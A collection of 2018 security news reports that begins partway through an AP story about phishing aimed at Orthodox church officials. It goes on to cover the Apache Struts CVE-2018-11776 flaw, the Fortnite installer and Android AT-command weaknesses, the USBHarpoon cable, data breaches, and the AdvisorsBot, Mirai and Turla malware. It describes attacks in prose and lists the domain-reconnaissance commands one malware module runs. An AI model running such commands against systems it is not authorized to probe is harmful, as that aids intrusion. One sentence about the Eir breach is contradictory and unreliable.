Secureworks' data shows hacking attempts on religious targets that took place in 2015 and 2016, but other material obtained by the AP suggests attempts to compromise the Ecumenical Patriarchate are ongoing.

On Oct. 16, 2017, an email purporting to come from Papachristou, who was just being appointed as spokesman, arrived in the inboxes of about a dozen Orthodox figures.

"Dear Hierarchs, Fathers, Brothers and Sisters in Christ!" it began, explaining that Papachristou was stepping into his new role as director of communications. "It's a very big joy for me to serve the Church on this position. Some suggestions on how to build up relations with the public and the press are provided in the file attached."

The file was rigged to install surveillance software on the recipients' computers.

The email's actual sender remains a mystery — independent analyses of the malicious message by Secureworks and its competitor CrowdStrike yielded nothing definitive.

Church officials told the AP they were disturbed by the hacker's command of church jargon and their inside knowledge of Papachristou's appointment.

"The one who made this is someone who knows us," one official said.

Priests and prelates don't make obvious targets for cyberespionage, but the stakes for the Kremlin are high as the decision on Tomos looms.

Granting the Ukrainian church full independence "would be that devastating to Russia," said Daniel Payne, a researcher on the board of the J.M. Dawson Institute of Church-State Studies at Baylor University in Texas.

"Kiev is Jerusalem for the Russian Orthodox people," Payne said. "That's where the sacred relics, monasteries, churches are ... it's sacred to the people, and to Russian identity."

Experts warn of possible attacks after PoC code for CVE-2018-11776 Struts flaw was published
27.8.2018 securityaffairs

The Exploit code for the recently discovered Critical remote code execution vulnerability CVE-2018-11776 in Apache Struts 2 was published on GitHub, experts fear massive attacks.
The CVE-2018-11776 vulnerability affects Struts 2.3 through 2.3.34, Struts 2.5 through 2.5.16, and potentially unsupported versions of the popular Java framework.

“Possible Remote Code Execution when using results with no namespace and in same time, its upper action(s) have no or wildcard namespace. Same possibility when using url tag which doesn’t have value and action se” reads the security advisory published by Apache.

“Possible Remote Code Execution when using results with no namespace and in same time, its upper action(s) have no or wildcard namespace. Same possibility when using url tag which doesn’t have value and action set.”

apache struts 2 flaw

Experts warn that it is possible to trigger the RCE flaw when namespace value isn’t set for a result defined in underlying XML configurations and at the same time, its upper action(s) configurations have no or wildcard namespace.

The flaw could be also exploited when using URL tag which doesn’t have value and action set and at the same time, its upper action(s) configurations have no or wildcard namespace.

According to the experts from Semmle that discovered the flaw, the vulnerability affects commonly-used endpoints of Struts, which are likely to be exposed.

“Attackers can attack vulnerable applications by injecting their own namespace as a parameter in an HTTP request. The value of that parameter is insufficiently validated by the Struts framework, and can be any OGNL string. OGNL (Object-Graph Navigation Language) is a powerful domain-specific language that is used to customize Apache Struts’ behavior,” the researcher explained.

An attacker could trigger the flaw by injecting his own namespace as a parameter in an HTTP request. The lack of proper validation for that parameter is the root of the problem.

Just two days after the Apache Software Foundation released their advisory a working proof-of-concept (PoC) was published online.

According to the experts from the threat intelligence firm Recorded Future, there is an intense activity related to the Struts flaw in a number of Chinese and Russian underground forums.

” Unfortunately, this makes the vulnerability trivial to exploit — in fact, proof-of-concept code has already been released, including a Python script that allows for easy exploitation. Recorded Future has also detected chatter in a number of Chinese and Russian underground forums around the exploitation of this vulnerability.” reads the analysis published by Recorded Future.

“Unlike last year’s Apache Struts exploit (CVE-2017-5638), which was at the center of the Equifax breach, this vulnerability appears easier to exploit because it does not require the Apache Struts installation to have any additional plugins running in order to successfully exploit it.”

Experts warn that the CVE-2018-11776 flaw is easier to exploit compared to the CVE-2017-5638 Apache Struts flaw that was exploited in the Equifax hack.

The number of potentially vulnerable application could be impressive.

“Apache Struts is a very popular Java framework and there are potentially hundreds of millions of vulnerable systems that could be exploited by this flaw. The challenge is in identifying how many systems are vulnerable.” continues Recorded Future.

“Because many of the servers running Apache Struts are backend application servers, they are not always easily identified, even by the system owners.”

The principal problem is that there are many reasons because Struts installs cannot be immediately updated especially in Critical systems.

Google researcher found Fortnite Android App vulnerable to Man-in-the-Disk attacks
27.8.2018 securityaffairs Android

A Google security researcher disclosed a vulnerability in the newcome Fortnite Android App that exposes it to Man-in-the-Disk attacks.
After a long wait, Fortnite Android app has finally arrived but it hides an ugly surprise, it is vulnerable to Man-in-the-Disk (MitD) attacks that can allow a third-party application to crash it or run malicious code.

The flaw was discovered by Google security researchers, it could be exploited by low-privileged malicious apps already installed on a users’ phone to hijack the Fortnite Android app.

Threat actor can carry out MitD attacks when an Android app stores data outside its highly-secured Internal Storage space, for example on an External Storage, that is shared by all apps.

The attacker could tamper with the data stored in the external storage space.

The attacker could hijack the installation process and install other malicious apps with higher permissions.

Epic Games, the authors of the popular game, have promptly released a new version (ver. 2.1.0) that addresses the issue.
Fortnite Android app
The Android Fortnite app is merely an installer, once users install the app, this installer leverages the device’s External Storage space to download and install the actual game.

“The Fortnite APK (com.epicgames.fortnite) is downloaded by the Fortnite Installer (com.epicgames.portal) to external storage:” reads a bug report published by a Google researcher.

“Any app with the WRITE_EXTERNAL_STORAGE permission can substitute the APK immediately after the download is completed and the fingerprint is verified. This is easily done using a FileObserver. The Fortnite Installer will proceed to install the substituted (fake) APK,”

The Fortnite Android App was made available for specific Samsung device models, its Installer performs the APK install silently via a private Galaxy Apps API. The only check made by the API is that the APK being installed has the package name com.epicgames.fortnite. An attacker can use a fake APK with the same package name to silently install the malicious code.
“If the fake APK has a targetSdkVersion of 22 or lower, it will be granted all permissions it requests at install-time. This vulnerability allows an app on the device to hijack the Fortnite Installer to instead install a fake APK with any permissions that would normally require user disclosure,” continues the researcher.

Below a video PoC of the attack shared by Google researcher and published by BleepingComputer:

Epic Games is disappointed by the way Google has disclosed the bug, the CEO Tim Sweeney explained to have asked Google wait more time to allow the new update to be installed by a large part of its players, but the company immediately published the news due to the risks for Android users.

“We asked Google to hold the disclosure until the update was more widely installed. They refused, creating an unnecessary risk for Android users in order to score cheap PR points,” Sweeney said on Twitter.

Tim Sweeney
· Aug 25, 2018
Replying to @manfightdragon and 2 others
Android is an open platform. We released software for it. When Google identified a security flaw, we worked around the clock (literally) to fix it and release an update.

The only irresponsible thing here is Google’s rapid public release of technical details.

Tim Sweeney
We asked Google to hold the disclosure until the update was more widely installed. They refused, creating an unnecessary risk for Android users in order to score cheap PR points.

7:34 AM - Aug 25, 2018
16 people are talking about this
Twitter Ads info and privacy
Is this a Google’s revenge because Epic Games is not distributing the Fortnite Android App?
Google, that is monitoring the installations of the game, privately explained to Epic Games CEO that there weren’t many unpatched installs remaining.

Lance McDonald
· Aug 25, 2018
Replying to @TimSweeneyEpic and 3 others
I noticed in the bug tracker they just said "As per the email" with regard to choosing only to wait 7 days. Did their email elaborate at all on why they did this? It seems like there's no good reason for it.

Tim Sweeney
Google did privately communicate something to the effect that they’re monitoring Fortnite installations on all Android devices(!) and felt that there weren’t many unpatched installs remaining.

7:56 AM - Aug 25, 2018
See Tim Sweeney's other Tweets
Twitter Ads info and privacy
But while a reason was not left in the original bug report, in a subsequent tweet, Sweeney revealed that Google engineers provided an explanation for their decision in private.

Android mobile devices from 11 vendors are exposed to AT Commands attacks
27.8.2018 securityaffairs Android

A group of researchers has conducted an interesting study on AT commands attacks on modern Android devices discovering that models of 11 vendors are at risk
A group of researchers from the University of Florida, Stony Brook University, and Samsung Research America, has conducted an interesting research on the set of AT commands that are currently supported on modern Android devices.

The experts published a research paper titled “ATtention Spanned: Comprehensive Vulnerability Analysis of AT Commands Within the Android Ecosystem,” the findings of their study has been presented at the Usenix Security Symposium a few days ago.

The research revealed that millions of mobile devices from eleven smartphone vendors are vulnerable to attacks carried out using AT commands.

AT (ATtention) commands is a set of short text strings that can be combined to perform a series for operations on mobile devices, including dialing, hanging up, and changing the parameters of the connection.

The AT commands can be transmitted via phone lines and control modems

Even if international telecommunications regulators have defined the list of AT commands that all smartphones must implement, many vendors have also added custom AT command sets that could be used to manage some specific features of the devices (i.e. camera control).

The experts analyzed over 2,000 Android firmware images from eleven Android OEMs (ASUS, Google, HTC, Huawei, Lenovo, LG, LineageOS, Motorola, Samsung, Sony, and ZTE) and discovered that the devices support over 3,500 different types of AT commands.

The researchers shared their findings with all affected vendors. The team published a website containing the list of phone models and firmware versions that expose the AT interface.

In some cases, using the custom AT commands it was possible to access very dangerous features implemented by the vendors. In many cases, the commands are not documented by vendors.

The experts discovered that almost any devices accept AT commands via the phone’s USB interface. To abuse the AT commands, the attacker needs to have physical access to the device or use an evil component in a USB dock or a charger.

“we systematically retrieve and extract 3,500 AT commands from over 2,000 Android smartphone firmware images across 11 vendors. We methodically test our corpus of AT commands against eight Android devices from four different vendors through their USB interface and characterize the powerful functionality exposed, including the ability to rewrite device firmware, bypass Android security mechanisms, exfiltrate sensitive device information, perform screen unlocks, and inject touch events solely through the use of AT commands.” reads the research paper.

“We demonstrate that the AT command interface contains an alarming amount of unconstrained functionality and represents a broad attack surface on Android devices.”

Experts explained that AT commands could be abused by attackers to rewrite device firmware, bypass Android security mechanisms, exfiltrate sensitive device information, and perform other malicious activities.

At commands

Another disconcerting discovery made by the experts is that it is possible to submit AT commands even if the phone had entered a locked state.

“In many cases, these commands are completely undocumented,” said Kevin Butler, an associate professor in the University of Florida Herbert Wertheim College of Engineering and a member of the research team, revealing that an OEM’s documentation doesn’t even mention their presence.

In the following videos, it is possible to see how it is possible to use AT commands to carry out an attack against mobile devices.

Experts demonstrated that arbitrary touchscreen events can be injected over USB mimicking touchscreen taps, a trick that could give an attacker the take full control over a mobile device.
“Commands for sending touchscreen events and keystrokes are also discovered for LG phones and the S8+; we can see the indications on the screen. We suspect these AT commands were mainly designed for UI automation testing, since they mimic human interactions. Unfortunately, they also enable more complicated attacks which only requires a USB connection” continues the paper.
The researchers published a Shell script that they used during for their tests, it allowed them to find strings containing ATcommands in the examined images.

“AT commands have become an integral part of the Android ecosystem, yet the extent of their functionality is unclear and poorly documented.” concludes the experts.

“We demonstrate that the AT command interface contains an alarming amount of unconstrained functionality and represents a broad attack surface on Android devices.”

Personal details of 37,000 Eir customers exposed after the theft of a laptop
26.8.2018 securityaffairs Incindent

Personal details of 37,000 Eir customers exposed after the theft of a laptop, including names, email addresses, phone numbers and account numbers.
Eir, the fixed, mobile and broadband telecommunications company of Ireland, has suffered a data breach this week.

Personal details of 37,000 Eir customers have been exposed according to the telecommunications company.

The root cause of the data leak is the theft offsite of an unencrypted laptop containing the customers’ data. Exposed records include names, email addresses, phone numbers and Eir account numbers.

“eir has reported a data breach of personal details for up to 37,000 customers to the Data Protection Commissioner. The data consists of names, email addresses, phone numbers and eir account numbers.” states the data breach notification published by the company on its official website.

“This is a result of the theft of one laptop, which was stolen off premises. No other personal or financial data relating to customers was stored on the laptop in question.”

According to the company, no financial data was exposed.


The telco company reported the incident to the Data Protection Commissioner and to gardaí, the good news for the customers is that the stolen information has been used by a third party in a targeted attack.

“Eir treats privacy and protection of all data extremely seriously and our policy is that all company laptops should be encrypted as well as a password protected,” it said.

“In this case the laptop had been decrypted by a faulty security update the previous working day, which had affected a subset of our laptops and was subsequently resolved.”

Eir is notifying the incident to the affected customers.

USBHarpoon a look-like charging cable that can hack into your computer
26.8.2018 securityaffairs Attack

A team of security experts has devised a rogue USB charging cable named USBHarpoon that can be used to compromise a computer in just a few seconds.
The team was composed of Olaf Tan and Dennis Goh of RFID Research Group, Vincent Yiu of SYON Security, and the popular Kevin Mitnick.

The USBHarpoon takes inspiration on the BadUSB project built by researchers at Security Research Labs lead by Karsten Nohl.

Nohl demonstrated that to turn one device type into another, USB controller chips in peripherals need to be reprogrammed. Unfortunately, many USB controller chips, including those in thumb drives, have no protection from such reprogramming.

USBHarpoon leverages on a charging cable instead of a USB drive to make the dirty job and hack into a computer.

The cable was modified to allow both data and power to pass through, in this way it is impossible for a victim to note any suspicious behavior.

A weaponized charging cable is not a novelty, a security researcher that goes online with the Twitter handle MG posted two videos that show the BadUSB cables he has built. The cable allows MD to carry out HID attacks when plugged into a computer’s USB port.

HID attacks via USB drives have become too suspicious. What about embedding the attack inside a USB cable?

Just a quick test for a few things I'm hoping to make over the next month.

8:40 AM - Jan 1, 2018
3,002 people are talking about this
Twitter Ads info and privacy
BadUSB Cable #2. HID attack through an Apple MacBook USB-C charger. Great for shared workspaces!

Build info coming this month. Still working out some things. These cables work on just about any device with a USB port (Mac/Win/Linux, phones too)

6:51 PM - Jan 6, 2018
3,710 people are talking about this
Twitter Ads info and privacy
MG demonstrated that his BadUSB cable would work with a 24-pin USB-C connector which is used in MacBook chargers. MG added that it “work on just about any device with a USB port,” including mobile devices.
Mitnick asked MG to build a cable for him to use in a keynote speech to demonstrate new attack methods, but he did not receive it in time for his speech.


Mitnick contacted the researcher Dennis Goh to build a cable to use in the attack, then Goh accepted and worked with Olaf Tan to build the USBHarpoon.

Once MG has seen the USBHarpoon, commented that the cable is the same he designed which images he shared with Mitnick.

· Aug 21, 2018
Replying to @kevinmitnick
@_MG_ @LucaBongiorni @P4wnP1

Heh, looks like the same boots I showed Kevin earlier this year, but with tape holding together? Just use some potting compound to seal it!
Hey @vysecurity did you do anything besides adding 2 resistors for charge pass through? That seems to work fine. Data passthrough though...

12:30 AM - Aug 21, 2018

See MG's other Tweets
Twitter Ads info and privacy
Yiu confirmed that his cable was not inspired by the MG’s research, anyway he credited the original work from MG once he learned about it.

The USBHarpoon works on unlocked machines, it allows the attackers to launch commands that download and execute a malicious code.

Yiu published a short video to show how USBHarpoon works. The video PoC shows a drone connected to a Windows PC and sends it commands to list content in a folder on the system drive.

Experts noticed that on Windows, the commands are launched within the Run prompt, while on Mac and Linux they are launched from a terminal.

The attack is any way visible to the owner of the machine, for this reason, to make the attack stealth it is necessary to devise a method to hide the interaction with the system, for example, to run the attack when the victim is not around the machine.

The team of researchers is currently searching for methods to trigger the attack in a stealthy way, for example, involving as attack vectors Bluetooth and radio signals.

As mitigation, the experts suggest the adoption of USB condoms, also known as data-blocking device that works by blocking the data pins on a USB cable.

Anyway, MG published a video PoC that shows how USB condoms can be bypassed as well.

#3 - BadUSB Cables wouldn't be complete without BadUSB Condoms.

Tempted to get a run of these made for the vendor area at the next security con.

3:19 AM - Jan 13, 2018
165 people are talking about this
Twitter Ads info and privacy
USBHarpoon is the demonstration that USB devices can be used as attack vectors difficult to detect.

Australia banned Huawei from 5G network due to security concerns
25.8.2018 securityaffairs BigBrothers

Chinese-owned telecommunications firm Huawei has been banned from Australia’s 5G network due to security concerns.
The Australian government considers risky the involvement of Huawei for the rolling out of next-generation 5G communication networks.

Huawei Australia defined the decision disappointing.

Huawei Australia

We have been informed by the Govt that Huawei & ZTE have been banned from providing 5G technology to Australia. This is a extremely disappointing result for consumers. Huawei is a world leader in 5G. Has safely & securely delivered wireless technology in Aust for close to 15 yrs

1:36 AM - Aug 23, 2018
899 people are talking about this
Twitter Ads info and privacy
The Chinese company has been founded by a former People’s Liberation Army official in 1987.

The US was the first country that warned of the security risks associated with the usage of the products manufactured by the Chinese telecommunications giant.

The Chinese firm denies having shared Australian customer data with the Chinese intelligence, but it is not enough for the Australian Government.

Australian authorities also banned the Chinese firm ZTE Corp.

Huawei Australia Chairman John Lord explained in June that banning one of the world’s leading 5G suppliers could impact Australia’s economic growth and productivity for generations.

The Chinese Government is concerned about the decision of the Australian Government.

“We urge the Australian government to discard ideological biases and create a level-playing filed for Chinese companies’ operations in Australia,” said Foreign Ministry spokesman Lu Kang.

In May, the Pentagon ordered retail outlets on US military bases to stop selling Huawei and ZTE products due to unacceptable security risk they pose.

The Pentagon considers the security risk posed by the adoption of the devices manufactured by the Chinese firms unacceptable, US officials believe the smartphones could be used to spy on military personnel.

“Huawei and ZTE devices may pose an unacceptable risk to the department’s personnel, information and mission,” said Pentagon spokesman Major Dave Eastburn.

“In light of this information, it was not prudent for the department’s exchanges to continue selling them.”

In February, Dan Coats, the Director of National Intelligence, along with several other top intel officials, invited Americans to avoid buying Huawei and ZTE products.

The restaurant chain Cheddar’s Scratch Kitchen has suffered a payment card breach
25.8.2018 securityaffairs Incindent

The restaurant chain Cheddar’s Scratch Kitchen suffered a payment card breach, hackers hacked the company network between Nov. 3, 2017 and Jan. 2, 2018
Once again here we are to discuss of a data breach suffered by a restaurant chain this time the victim is Cheddar’s Scratch Kitchen.

The news has been confirmed by the company that was informed of the data breach this month.

Attackers breached into the company network between Nov. 3, 2017 and Jan. 2, 2018 and stole customer payment card data.

“Cheddar’s Scratch Kitchen restaurants have been the victims of cyberattacks, which may have resulted in unauthorized access to or acquisition of your payment card information.” reads the data breach notification.

“On August 16, 2018, Cheddar’s Scratch Kitchen (a concept acquired by Darden Restaurants in 2017) learned that between November 3, 2017 and January 2, 2018, an unauthorized person or persons gained access to the Cheddar’s Scratch Kitchen network and were able to access and potentially obtain payment card information used to make purchases in certain Cheddar’s Scratch Kitchen restaurants.”

Restaurants affected by the security breach are in Alabama, Arizona, Arkansas, Delaware, Florida, Illinois, Indiana, Iowa, Kansas, Louisiana, Maryland, Michigan, Missouri, Nebraska, New Mexico, North Carolina, Ohio, Oklahoma, Pennsylvania, South Carolina, Texas, Virginia, and Wisconsin.

Cheddarâ??s Scratch Kitchen

Cheddar’s Scratch Kitchen hired a third-party cybersecurity firm to investigate the security breach, the investigation is still ongoing It seems that hackers compromised a network that was permanently disabled and replaced by April 10, 2018, current systems and networks were not impacted by this incident.

“The unauthorized access appears to have occurred on a network that was permanently disabled and replaced by April 10, 2018.” continues the notification.

“It’s important to note that there are no indications of unauthorized access to the current Cheddar’s Scratch Kitchen network and systems.”

The company is recommending customers to enrol in the identity protection services they are providing. Customers must remain vigilant and take steps to themselves from identity theft by reviewing your account statements and by checking your credit report from one or more of the national credit reporting agencies periodically.

The company is offering a free annual credit report from each of the nationwide credit reporting companies—Equifax, Experian, and TransUnion.

AdvisorsBot Malware Downloader Discovered

24.8.2018 securityweek Virus

Proofpoint security researchers have discovered a previously undocumented downloader that appeared in malicious email campaigns targeting hotels, restaurants, and telecommunications entities.

The attacks, attributed to a threat actor tracked as TA555, are leveraging the downloader as a first-stage payload, to load a module performing fingerprinting of the targeted machine. Presumably, once a target of interest has been identified, additional modules are loaded onto the system.

Dubbed AdvisorsBot, the malware was first observed in May 2018. It is written in C and is under active development, Proofpoint says. In fact, the security firm has already observed malware versions completely rewritten in PowerShell and .NET.

The early command and control (C&C) domains used by the malware all contained the word “advisors,” hence the malware’s name.

Initially, the attacks leveraged macros to execute a PowerShell command that would fetch and run AdvisorsBot. In early August, the PowerShell command would download another PowerShell script to execute embedded shellcode that would run the downloader without writing it to disk, while the macro in the latest attacks fetched a PowerShell version of AdvisorsBot directly.

The threat includes anti-analysis features, such as the use of junk code, including extra instructions, conditional statements, and loops, to slow down reverse engineering. The x86 version of the malware contains significantly more junk code, Proofpoint security researchers have discovered.

AdvisorsBot can also detect various analysis tools and checks whether it is running on a virtual machine. More recent malware variants were improved with additional anti-analysis checks, the researchers say.

The threat communicates with the C&C server over HTTPS. The data it sends to the server includes information about the system, such as machine SID, CRC32 hash of the computer name, some unknown hardcoded values, and the Windows version.

Commands from the C&C arrive via GET requests, but the malware only includes support for two commands at the moment. Based on that, it can either load a module or load a shellcode in a thread.

Only the system fingerprinting module was observed being sent from a C&C server. It can take screenshots, extract Microsoft Outlook account details, and run a series of system commands (including systeminfo, ipconfig /all, netstat –f, net view, tasklist, whoami, net group "domain admins" /domain, and dir %USERPROFILE%\Desktop).

The most recent AdvisorsBot campaign employed a new version of the malware, rewritten using PowerShell and a .NET DLL embedded inside the PowerShell script. Tracked as PoshAdvisor, the malware is not an exact duplicate of AdvisorsBot, but is highly similar to it.

“While it remains to be seen whether this threat actor will continue to distribute AdvisorsBot, PoshAdvisor, or both in future campaigns, this pair of downloaders, with extensive anti-analysis features and increasingly sophisticated distribution techniques, warrant further investigation,” Proofpoint concludes.

Severe Flaws Found in Yokogawa Switches, Control Systems
24.8.2018 securityweek ICS

Japanese electrical engineering company Yokogawa published two security advisories last week to inform customers that some of its products are affected by serious vulnerabilities.

One of the flaws, for which ICS-CERT also published an advisory, is CVE-2018-0651, a high severity stack-based buffer overflow affecting the license management function present in some products.

Sending specially crafted data to the licensing function could cause it to stop, but users have been warned that an unprivileged attacker with network access to the targeted system may also be able to exploit the flaw for arbitrary code execution.

According to Yokogawa and ICS-CERT, the security hole impacts the ASTPLANNER production scheduling software, the TriFellows package for the CENTUM CS control system, STARDOM control systems, and the iDefine functional safety management tool for the ProSafe-RS process safety system.

Yokogawa has already released a patch for STARDOM controllers and it plans on issuing a fix for iDefine. ASTPLANNER and TriFellows customers have been advised to contact the company’s support team.

The second vulnerability, which impacts more than a dozen of Yokogawa’s Vnet/IP industrial switches, has also been classified as “high severity,” but no CVE identifier has been assigned.

The flaw affects the debugging functionality of these devices. The problem is related to the tcpdump command, which is used for monitoring and analyzing network traffic. The tcpdump command is disabled by default, but if users have enabled it, an unprivileged network attacker could use it to disrupt the connection or make changes to the switch’s configuration.

A few months ago, Yokogawa informed users that it released a firmware update for its STARDOM controllers to address a critical hardcoded credentials vulnerability that can be exploited remotely to take control of a device.

Wickr Partners with Psiphon to Improve Network Availability
24.8.2018 securityweek IT

Despite government demands for backdoors into end-to-end encryption, it remains a legitimate requirement for business. Political tensions affect, but don't stop, international commerce; and business teams visiting foreign countries need to know that their communications are secure and delivered. The problem is domestic as well as international -- staff are increasingly mobile and work from any hotspot or free WiFi location they can find.

Such internet users need to know that their data remains secure from whatever location they use. This is a requirement solved by Wickr. It provides encrypted communication from source to destination whatever the location. Traveling staff can use any internet cafe or hotspot confident that their content cannot be sniffed.

But there remains a problem. Some of those source locations impose local restrictions on traffic -- it could be anything from traffic management controls to ISP restrictions, or simply a flakey network. The result is that Wickr content may be secure, but delivery can become problematic. To solve this problem Wickr has partnered with Psiphon to create WOA -- Wickr Open Access.

"Wickr already solves the crypto part," Joel Wallenstrom, president and CEO of Wickr told SecurityWeek. It triple-encrypts every bit of streaming data and applies perfect forward and perfect backward secrecy. "But a really critical part of enterprise communication is availability. That's why we've partnered with Psiphon. Together, we've developed something unique in the market, combining our encryption with how Psiphon ensures a robust and always-available network."

Psiphon can be described as a smart VPN. WOA combines Wickr's cryptography with Psiphon's network availability to provide consistent deliverable security, anywhere.

Chris Lalonde, Wickr's COO, explains. "Global enterprises have teams all over the world and they have people traveling all the time. The challenge that you face is that in many cases you are on an unpredictable network -- whether that's a coffee shop in Soho, a cafe in Paris, or some place in Hong Kong. What happens in a lot of those cases is users end up getting frustrated. They tend to think that it is the application when really it's the network they're using."

Enterprises have two problems. Mobile workers traveling locally, using local coffee shops with poor network connectivity and the potential for industrial espionage; and international business teams visiting nations with what we might term repressive governments. Wallenstrom describes the first. "If you're in a local coffee shop with free wifi it may have certain protocols restricted in order to maximize web-serving traffic. What that means for an end user trying to get on a call for a business meeting is it just doesn't work. This happens anywhere where the coffee shop is trying to optimize its free stuff -- to the end user, it just feels like the application is crappy."

Michael Hull, president of Psiphon Inc (which grew out of a Citizen Lab project) provides the international perspective. "There are probably 30 to 40 countries in the world where governments, ISPs and security agencies are all colluding together to control the local population and economy," he told SecurityWeek. "This is the problem that Psiphon was founded to solve. We've been providing an anti-censorship solution to the big international broadcasters for the last ten years or so. The BBC uses us, the Voice of America, Radio Free Europe and more use us to make sure that when governments try to intervene to prevent people from accessing information in contravention of Article 19 of the UN Declaration of Human Rights, we have a very sophisticated smart VPN that is capable of getting around large scale filtering systems and so on. We've honed our technology in the classic regions like China, Iran and Russia. The internet is being regularly disrupted by different ISPs for various reasons, some of them human rights related, some are business related."

Wickr has integrated the technology developed by Psiphon to ensure reliable network routing through the vagaries of both the local coffee shop and intrusive foreign governments. Psiphon operates 3500 servers, hosted on third party cloud providers, throughout the world -- ensuring that Wickr's encrypted traffic can get from anywhere in the world to anywhere in the world safely, securely and predictably.

"We're enabling users to simply put their application to work all the time, anywhere," said Lalonde. "Combining with Psiphon, WOA enables users to have a one-two punch to not only secure their data end-to-end but to make sure it gets to where it needs to go."

This gives it another practical enterprise application: incident response. "Let's say that my corporate network has been hacked," explained Wallenstrom, "and I don't know what to trust and what not to trust on my infrastructure. An attacker could be doing all sorts of things to my network traffic in order to see what the incident response team is doing. This happens -- it happened in the Sony hack. WOA gives the CISO and incident response team assurance that not only are the messages encrypted, but they are getting through to the destination when they need to."

"In today’s world," says Chris Lalonde, Wickr's COO, "end users are rarely aware of the networks across which their data is transmitted. Sometimes networks are restricted, other times they are degraded or monitored. With WOA, users can be certain that their data is secure in transit, their critical communications make it to the intended recipients and no service provider -- including Wickr -- has access to end user data."

Psiphon describes its product as a circumvention tool that utilizes VPN, SSH and HTTP Proxy technology to provide uncensored access to Internet content. But it is more than a VPN that gives access to Pirate Bay when the local ISP blocks it. Wickr is using Psiphon to not just bypass the local ISP, but to bypass problematic local networks to ensure that traveling teams can maintain secure communications from even the most far-flung locations.

The enterprise version is available today. It will be rolled out to other versions of Wickr, including the free version, in the future.

Cross-Platform Mirai Variant Leverages Open-Source Project
24.8.2018 securityweek IoT

A newly discovered Mirai variant has been created using an open-source project that makes the process of cross compilation very easy, Symantec reports.

Mirai, a piece of malware that first emerged in the fall of 2016, targets a broad range of Internet of Things (IoT) devices to ensnare them into botnets capable of launching massive distributed denial of service (DDoS) attacks.

Numerous Mirai variants have emerged since the malware’s source code was leaked in October 2016, targeting a broader range of devices and increasing resilience. Some of the most recent Mirai iterations include Wicked, Satori, Okiru, Masuta, and others.

Now, Symantec says its researchers discovered a Mirai variant compatible with multiple architectures. More robust compared to previously observed iterations, the sample has been built using the open-source project called Aboriginal Linux.

The platform has been designed to make cross compilation a simple task, allowing software authors to create images targeting multiple architectures, including ARM, MIPS, PowerPC, and x86.

Apparently, this is exactly why the developers behind the new Mirai variant chose Aboriginal Linux too. When compiled using the open source project, the malware can be executed on a variety of devices, including routers, IP cameras, other types of connected products, and Android devices.

“Given that the existing code base is combined with an elegant cross compilation framework, the resultant malware variants are more robust and compatible with multiple architectures,” Symantec researcher Dinesh Venkatesan explains.

The observed sample includes functionality consistent with Mirai’s behavior, the security researcher says. The infection starts with a shell script on a vulnerable device, which attempts to download and run individual executables until the binary compliant with the current architecture is found.

When executed on an infected device, the Mirai payload attempts to spread to devices with default credentials or vulnerabilities. The new sample was observed scanning for over 500,000 randomly generated IP addresses and attempting to deliver a raw packet data over port 23.

While the Aboriginal Linux project is not malicious, this is yet another example of how malware authors leverage open-source software for their nefarious purposes, Venkatesan points out.

Turla Backdoor Controlled via Email Attachments
24.8.2018 securityweek APT

ESET security researchers have analyzed a new backdoor used by the Russian-speaking advanced persistent threat (APT) group known as Turla.

Also known as Snake, or Uroburos, Turla has been active since at least 2007, targeting governments, state officials, diplomats, and military authorities, including Swiss defense firm RUAG and the U.S. Central Command, among others.

Last year, security researchers discovered a link between the group and one of the earliest known state-sponsored cyberespionage operations carried out in the ‘90s.

In 2017, Turla targeted Germany’s Federal Foreign Office to implant a backdoor on several computers and steal data almost the entire 2017. The hackers first compromised the network of the country’s Federal College of Public Administration and leveraged it to breach the network of the Foreign Office in March 2017.

Now, ESET reveals that the backdoor used in this attack was also used to “open a covert access channel to the foreign offices of another two European countries, as well as to the network of a major defense contractor.”

The backdoor was supposedly created as far back as 2009 and has received numerous updates over time, getting new functionality, including stealth and resilience. A version discovered in April 2018 can execute malicious PowerShell scripts directly in memory, a tactic many actors have been adopting over the past few years.

The malware now targets Microsoft Outlook, subverting the application’s legitimate Messaging Application Programming Interface (MAPI) to access the targets’ mailboxes. Previously, it was observed targeting The Bat! email client, ESET notes.

The backdoor doesn’t use a conventional command-and-control (C&C) infrastructure, being operated via specially crafted PDF files in email attachments instead. The malware is delivered in the form of a Dynamic Link Library (DLL) module and is installed using a legitimate Windows utility (RegSvr32.exe).

For persistence, the threat modifies Windows registry entries. Specifically, it leverages the “COM object hijacking” technique, which ensures that the backdoor is activated each time Microsoft Outlook is launched.

The backdoor generates logs on every sent or received email message (with information on sender, recipient, subject, and attachment name), and regularly bundles the logs together with other data and sends them to Turla’s operators via a PDF attached to an email message.

For each incoming email, the malware checks for the presence of a PDF that may contain commands and accepts commands from anyone able to encode them into a PDF document. This means that Turla’s operators can regain control of an infected machine by sending commands from any email address.

“The backdoor’s level of resilience to takedowns is almost on a par with that of a rootkit that, in inspecting inbound network traffic, listens for commands from its operators,” ESET notes.

On compromised machines, the malware goes to lengths to stay undetected and no email received by the attacker ever appears in the mailbox. Moreover, the backdoor also blocks all of the notifications of incoming email messages that have been sent by its operators.

The malware includes support for a broad range of commands, including file manipulation, shell command execution, process creation, directory manipulation, and more, ESET reveals in a technical analysis (PDF). The main purpose of the malware is data exfiltration and the download and execution of additional programs or commands.

“The Turla backdoor is a fully-fledged backdoor that uses customized and proprietary techniques, can work independently of any other Turla component, and is fully controlled by email. In fact, ESET researchers are not aware of any other espionage group currently utilizing a backdoor that is entirely controlled by emails, and specifically through PDF attachments,” ESET concludes.

Monthly Patches Are Recommended Best Practice for Android, Google Says
24.8.2018 securityweek Android

The timely delivery of security updates for Android smartphones is a highly important defense-in-depth strategy, Google says.

Each month for the past three years, the search company has been releasing security patches for the Android platform and has been also urging device manufacturers to push the updates to their users in a timely manner.

In October last year, Kaspersky revealed that the security fixes were still slow to arrive on many devices. Things aren’t looking much better this year either, as Security Research Labs revealed in April: manufacturers often omit patches when releasing security updates.

Now, three years after the critical Stagefright flaw prompted Google to take a more active stance on addressing vulnerabilities in Android, the Internet giant says that monthly security updates are the recommended best practice for Android smartphones.

Google is providing manufacturers with monthly Android source code patches so they can include those in firmware updates, and also allows them to leverage the Google firmware over-the-air (FOTA) servers for free.

Moreover, the search company pushes its own set of updates over-the-air to Pixel devices and also requires that these monthly patches be released for all devices in the Android One program.

According to Google, Android manufacturers should at least deliver regular “security updates in advance of coordinated disclosure of high severity vulnerabilities,” which are usually published in Android bulletins.

“Since the common vulnerability disclosure window is 90 days, updates on a 90-day frequency represents a minimum security hygiene requirement,” Google notes.

This is also one of the requirements for Android devices to be listed in the Android Enterprise Recommended program: devices should receive security patches at least every 90 days, with monthly updates strongly recommended.

